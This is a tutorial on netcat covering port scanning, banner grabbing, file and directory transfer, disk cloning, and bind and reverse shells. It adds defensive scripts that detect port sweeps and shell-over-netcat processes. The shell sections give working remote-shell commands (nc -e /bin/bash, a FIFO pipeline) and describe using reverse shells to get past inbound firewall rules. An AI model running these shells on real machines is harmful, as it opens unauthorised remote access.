Play Linux: Netcat, the Swiss Army knife of network tools


Netcat is known as the Swiss Army knife of network tools: it reads and writes data across the network over TCP and UDP. By combining it with other tools and with redirection, you can use it in your scripts in a variety of ways. It is surprising how much you can do with the netcat command.

What netcat does is create a connection between two computers and hand back two data streams; what you do after that is up to your imagination. You can build a server, transfer files, chat with friends, stream media, or use it as a standalone client for other protocols.

Here are some examples of using netcat.

A (172.31.100.7)

B (172.31.100.23)

Examples of Linux netcat commands:

1. Port Scan

Port scans are often used by system administrators and hackers to discover which ports are open on a machine, which helps them identify vulnerabilities in the system.

nc -z -v -n 10.9.17.100 21-25
nc: connect to 10.9.17.100 port (tcp) failed: Connection refused
Connection to 10.9.17.100 port [tcp/*] succeeded!
nc: connect to 10.9.17.100 port (tcp) failed: Connection refused
nc: connect to 10.9.17.100 port (tcp) failed: Connection refused
nc: connect to 10.9.17.100 port (tcp) failed: Connection refused

Netcat can run in TCP or UDP mode. TCP is the default; the -u option switches to UDP.

The -z option tells netcat to use zero I/O: the connection is closed as soon as it succeeds and no data is exchanged.

The -v option enables verbose output.

The -n option tells netcat not to use DNS to reverse-resolve the IP address into a host name.

This command prints all the open ports in the range 21 to 25. A banner is a text message sent to you by the service you connect to. Banner information is useful when you are trying to identify a vulnerability or the type and version of a service. However, not all services send a banner.

Once you have found the open ports, you can easily connect to the service with netcat and grab its banner.

nc -v 10.9.17.100 22
Connection to 10.9.17.100 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_5.3
Protocol mismatch.

The netcat command connects to open port 22 and prints the banner of the service running on this port.
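
Seen from the scanned host, the sweep above is one source touching several ports within a second or two, most of them refused. The following detection sketch is an added example, not part of the original article; the log format (epoch, source, destination, port, verdict) and the sample lines are constructed.

```bash
#!/bin/sh
# Added example: flag port sweeps such as `nc -z -v -n HOST 21-25` in a
# connection log. The log format (epoch src dst dport verdict) is constructed.

sample_log() {
cat <<'EOF'
1700000000 172.31.100.23 10.9.17.100 21 REFUSED
1700000000 172.31.100.23 10.9.17.100 22 ACCEPT
1700000001 172.31.100.23 10.9.17.100 23 REFUSED
1700000001 172.31.100.23 10.9.17.100 24 REFUSED
1700000001 172.31.100.23 10.9.17.100 25 REFUSED
1700000005 172.31.100.7 10.9.17.100 22 ACCEPT
1700000040 172.31.100.7 10.9.17.100 22 ACCEPT
1700000090 172.31.100.7 10.9.17.100 1567 ACCEPT
EOF
}

# detect_sweeps WINDOW MIN_PORTS
# Reads the log on stdin and prints "src dst ports=N refused=M" for every
# source that touched at least MIN_PORTS distinct ports on one destination
# inside the same WINDOW-second bucket. A -z scan stands out twice: many
# distinct ports in a short time, and most of them refused.
detect_sweeps() {
  awk -v win="$1" -v min="$2" '
    NF == 5 {
      key = $2 " " $3 " " int($1 / win)
      if (!((key, $4) in seen)) { seen[key, $4] = 1; ports[key]++ }
      if ($5 == "REFUSED") refused[key]++
    }
    END {
      for (key in ports)
        if (ports[key] >= min) {
          split(key, f, " ")
          printf "%s %s ports=%d refused=%d\n", f[1], f[2], ports[key], refused[key]
        }
    }' | sort
}

sample_log | detect_sweeps 10 5
```

The ordinary client at 172.31.100.7 reaches only two ports over ninety seconds and is not reported; fixed buckets can split a sweep that straddles a bucket boundary, so choose a window longer than the scans you expect.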

2. Chat Server

If you want to talk to your friends, there is plenty of software and there are plenty of messaging services you can use. But what if you do not have that luxury, for example in a computer lab where all external connections are restricted: how do you communicate with a friend who sits in the next room all day? Don't despair: netcat gives you a way to create a chat server on a predetermined port so that he can reach you.

Server

nc -l 1567

The netcat command starts a TCP server on port 1567. Everything typed on standard input is sent to that port and everything received is written to standard output, so both input and output are shown in this shell.

Client

nc 172.31.100.7 1567

Whatever you type on machine B will appear on machine A.

3. File Transfer

Most of the time we transfer files over the network with some tool or other. There are many ways to do it, such as FTP, SCP and SMB, but when you only need to transfer a file temporarily or once, it is really not worth spending time installing and configuring software on your machine. Suppose you want to pass a file file.txt from A to B. Either A or B can be the server or the client; below, A is the server and B is the client.

Server

nc -l 1567 < <(seq 5)

Client

nc -n 10.9.17.100 1567
1
2
3
4
5

Here we create a server on A and redirect netcat's input to the data to send (file.txt in our scenario; the demonstration above feeds it the output of seq 5 instead). When any connection to that port succeeds, netcat sends the contents.

On the client, redirecting netcat's output to file.txt saves the data: when B connects to A, A sends the file contents and B stores them in file.txt. In the demonstration above the output is not redirected, so the received lines are printed on the terminal.

The source of the file does not have to be the server; it also works the other way round. Below we send the file from B to A, but the server is created on A; this time we only need to redirect netcat's output on the server and redirect the input from the file on B.

B as Server

Server

nc -l 1567 > file.txt

Client

nc 172.31.100.23 1567 < file.txt

4. Directory Transfer

Sending a file is simple. If we want to send several files or an entire directory, it is just as simple: pack them with the archiving tool tar and send the archive.

Suppose you want to transfer a directory over the network from A to B.

Server

tar -cvf - dir_name | nc -l 1567

Client

nc -n 172.31.100.7 1567 | tar -xvf -

Here, on server A, we create a tar archive and write it to standard output by giving - as the archive name, then pipe it to netcat, which sends it over the network.

On the client we receive the archive through the netcat pipe and unpack it.

If you want to save bandwidth by compressing the archive during transfer, you can use bzip2 or another compression tool.

Server

tar -cvf - dir_name | bzip2 -z | nc -l 1567

Compress with bzip2.

Client

nc -n 172.31.100.7 1567 | bzip2 -d | tar -xvf -

Decompress with bzip2.
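
The client pipelines above unpack whatever arrives on the socket, and netcat does nothing to identify the sender. One way to check an archive before unpacking it, as an added example that is not part of the original article; the function names and the spool file incoming.tar are assumptions.

```bash
#!/bin/sh
# Added example: vet an archive received over netcat before unpacking it.
# Spool the stream first instead of piping it straight into tar:
#   nc -n 172.31.100.7 1567 > incoming.tar

# unsafe_members: read member names on stdin (one per line, as printed by
# `tar -tf`) and print the ones that would land outside the target directory.
unsafe_members() {
  awk -F/ '
    substr($0, 1, 1) == "/" { print "absolute: " $0; next }
    { for (i = 1; i <= NF; i++) if ($i == "..") { print "traversal: " $0; next } }
  '
}

# safe_extract ARCHIVE DEST: refuse the whole archive if any member is unsafe,
# otherwise unpack it into DEST. Link members are not inspected here.
safe_extract() {
  archive=$1
  dest=$2
  bad=$(tar -tf "$archive" | unsafe_members)
  if [ -n "$bad" ]; then
    printf 'refusing %s:\n%s\n' "$archive" "$bad" >&2
    return 1
  fi
  mkdir -p "$dest" && tar -xf "$archive" -C "$dest"
}

# Constructed listing: two normal members and two that escape the directory.
printf '%s\n' dir_name/ dir_name/notes.txt ../outside.txt /tmp/absolute.txt |
  unsafe_members
```

For the bzip2 variant, decompress into the spool file first (nc ... | bzip2 -d > incoming.tar) and run the same check.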

5. Encrypt the data you send over the network

If you are concerned about the security of your data being sent over the Internet, you can encrypt it with a tool such as mcrypt before sending your data.

Server

nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt

Here mcrypt, called with -d, decrypts the data it receives.

Client

mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567

Here mcrypt encrypts the data before it is sent.

Both commands prompt for a password; make sure the same password is used on both ends.

Here we use mcrypt for encryption, but any other encryption tool will do.
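
The commands above select ECB mode (-m ecb), in which equal plaintext blocks produce equal ciphertext blocks, so the structure of the file stays visible on the wire. The following comparison is an added example, not part of the original article: it uses openssl with AES as a stand-in for mcrypt, and the key, IV and plaintext are constructed demo values.

```bash
#!/bin/sh
# Added example: why "-m ecb" is a weak choice. openssl's AES stands in for
# mcrypt here; the key, IV and plaintext are constructed demo values.
KEY=000102030405060708090a0b0c0d0e0f
IV=0f0e0d0c0b0a09080706050403020100

# Constructed plaintext: eight identical 16-byte blocks, the kind of
# repetition found in disk images, archive padding and uncompressed media.
plaintext() {
  i=0
  while [ "$i" -lt 8 ]; do printf 'AAAAAAAAAAAAAAAA'; i=$((i + 1)); done
}

# repeated_blocks: read ciphertext on stdin and print how many distinct
# 16-byte blocks occur more than once.
repeated_blocks() {
  od -An -v -tx1 | tr -d ' \n' | fold -w 32 | sort | uniq -d | wc -l | tr -d ' '
}

ecb_repeats() { plaintext | openssl enc -aes-128-ecb -K "$KEY" | repeated_blocks; }
cbc_repeats() { plaintext | openssl enc -aes-128-cbc -K "$KEY" -iv "$IV" | repeated_blocks; }

if command -v openssl >/dev/null 2>&1; then
  echo "ECB repeated blocks: $(ecb_repeats)"   # equal plaintext blocks show through
  echo "CBC repeated blocks: $(cbc_repeats)"   # chaining hides the repetition
fi
```

Neither mode detects modification in transit, so for anything that matters prefer a tool that provides authenticated encryption.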

6. Streaming video

Although netcat is not the best way to stream video, if the server has no dedicated tool for it, netcat still gives us a way to do it.

Server

cat video.avi | nc -l 1567

Here we simply read from a video file and redirect the output to netcat.

Client

nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

Here we read the data from the socket and redirect it to mplayer.

7. Cloning a device

If you have installed and configured a Linux machine and need to repeat the same setup on other machines, you do not have to go through the configuration again. There is no need to repeat the installation: just boot the other machine from a bootable disk and clone your machine.

Cloning a Linux PC is simple. Assume your system is on disk /dev/sda.

Server

dd if=/dev/sda | nc -l 1567

Client

nc -n 172.31.100.7 1567 | dd of=/dev/sda

dd is a tool that reads raw data from a disk. We redirect its output through the netcat server to the other machine, which writes it to its disk; everything is copied, including the partition table. If the target disk is already partitioned and only the root partition needs cloning, change sda to sda1, sda2 and so on, according to where the system root partition is.

8. Open a shell

We have all used remote shells through telnet and ssh, but if these two commands are not installed and we have no permission to install them, we can also create a remote shell with netcat.

Suppose your netcat supports the -c and -e options (default netcat).

Server

Note: versions that provide -e also require the -p option.

[email protected] 10.9.17.100 02:47:55 ~/tmp/10.2.3.5 >nc -lp 1567 -e '/bin/bash -i'

Client

[email protected] 10.9.17.101 02:47:45 ~/tmp/10.2.3.5 >nc 10.9.17.100 1567
bash: .host_name: No such file or directory
--------------------------------------------------------------------
Welcome to  you:10.2.3.5! Your login dir is:/root/tmp/10.2.3.5!
--------------------------------------------------------------------
[email protected] 10.9.17.100 02:48:06 ~/tmp/10.2.3.5 >

Here we have created a netcat server and told it to execute /bin/bash once a connection succeeds.

If netcat does not support the -c or -e option (OpenBSD netcat), we can still create a remote shell.

Server

mkfifo /tmp/tmp_fifo
cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

Here we create a FIFO and then use a pipeline to feed the FIFO's content to the shell. 2>&1 redirects standard error to standard output, and the result is piped to netcat, which listens on port 1567. Finally, netcat's output is redirected back into the FIFO.

Description

Input received from the network is written to the FIFO.

The cat command reads the FIFO and sends its contents to the sh command.

The sh process receives the input and writes its output to netcat.

Netcat sends the output to the client over the network.

As to why this works: a pipeline runs its commands in parallel. A FIFO is used instead of a regular file because a FIFO makes the reader wait for data; with a regular file, cat would finish as soon as it started reading the empty file.

Simply connect to the server from the client.

Client

nc -n 172.31.100.7 1567

You will get a shell prompt on the client.

9. Reverse Shell

A reverse shell is a shell that is opened on the client side. It is called a reverse shell because, unlike the other configurations, here the server uses a service provided by the client.

Server

[email protected] 10.9.17.100 02:44:34 ~/tmp/10.2.3.5 >nc -l -p 1567
hostname
ecdata-slave-01

On the client side, simply tell netcat to execute a shell once the connection is complete.

Client

[email protected] 10.9.17.101 02:44:36 ~/tmp/10.2.3.5 >nc -v 10.9.17.100 1567 -e /bin/bash echo 111
ecdata-master [10.9.17.100] 1567 (jlicelmd) open

Now, what's so special about the reverse shell?

The reverse shell is often used to get around firewall restrictions such as blocked inbound connections. For example, I have a machine with the private IP address 172.31.100.7 that reaches the external network through a proxy server. If I want to get a shell on this machine from outside the network, say from 1.2.3.4, I use a reverse shell for this purpose.
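
Because a reverse shell is an outbound connection, inbound firewall rules do not stop it; on the host itself, though, the command lines from sections 8 and 9 are visible in the process list. The following triage sketch is an added example, not part of the original article; the process snapshot is constructed and the reason labels are assumptions.

```bash
#!/bin/sh
# Added example: triage a process list for the shell-over-netcat patterns
# from sections 8 and 9. Input is `ps -eo pid,args` without its header.

# Constructed snapshot, not real output.
sample_ps() {
cat <<'EOF'
2101 nc -lp 1567 -e /bin/bash -i
2143 cat /tmp/tmp_fifo
2144 /bin/sh -i
2145 nc -l 1567
2200 nc -v 10.9.17.100 1567 -e /bin/bash
2300 nc 172.31.100.7 1567 -p 25
2310 bash
EOF
}

# audit_nc: print "pid reason" for every suspicious line on stdin.
#   nc-exec      netcat started with -e or -c (runs a program per connection;
#                -c means something else in some builds, so verify the hit)
#   nc-listener  netcat listening without -e/-c (chat, file transfer, FIFO relay)
#   shell-i      sh/bash forced interactive with -i, as in the FIFO pipeline
audit_nc() {
  awk '
    {
      n = split($2, path, "/"); prog = path[n]; reason = ""
      isnc = (prog == "nc" || prog == "ncat" || prog == "netcat")
      issh = (prog == "sh" || prog == "bash")
      for (i = 3; i <= NF; i++) {
        if (isnc && $i ~ /^-[A-Za-z]*[ec]$/) reason = "nc-exec"
        else if (isnc && reason == "" && $i ~ /^-[A-Za-z]*l/) reason = "nc-listener"
        else if (issh && $i == "-i") reason = "shell-i"
      }
      if (reason != "") print $1, reason
    }'
}

sample_ps | audit_nc
```

Each hit is a lead rather than a verdict: a shell-i next to an nc-listener and a cat on a FIFO matches the section 8 pipeline, while a plain client such as the -p 25 example is not reported.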

10. Specify the source port

Suppose your firewall filters all ports except port 25; you then need to specify the source port with the -p option.

Server-side

nc -l 1567

Client

nc 172.31.100.7 1567 -p 25

Using a port within 1024 requires root access.

This command uses port 25 on the client for the communication; otherwise a random port is used.

11. Specify the source address

Suppose your machine has multiple addresses and you want to state explicitly which address to use for outgoing data traffic. We can use netcat's -s option to specify the IP address.

Server-side

nc -u -l 1567 < file.txt

Client

nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt

The command binds to the address 172.31.100.5.

These are just some examples of using netcat.

Other uses include:

Using the -t option to emulate a Telnet client,

Acting as an HTTP client to download files,

Connecting to a mail server and checking messages over the SMTP protocol,

Using FFmpeg to capture the screen and share it via streaming, and more.

Simply put, as long as you understand the protocol, you can use netcat as the network transport to implement all kinds of clients.

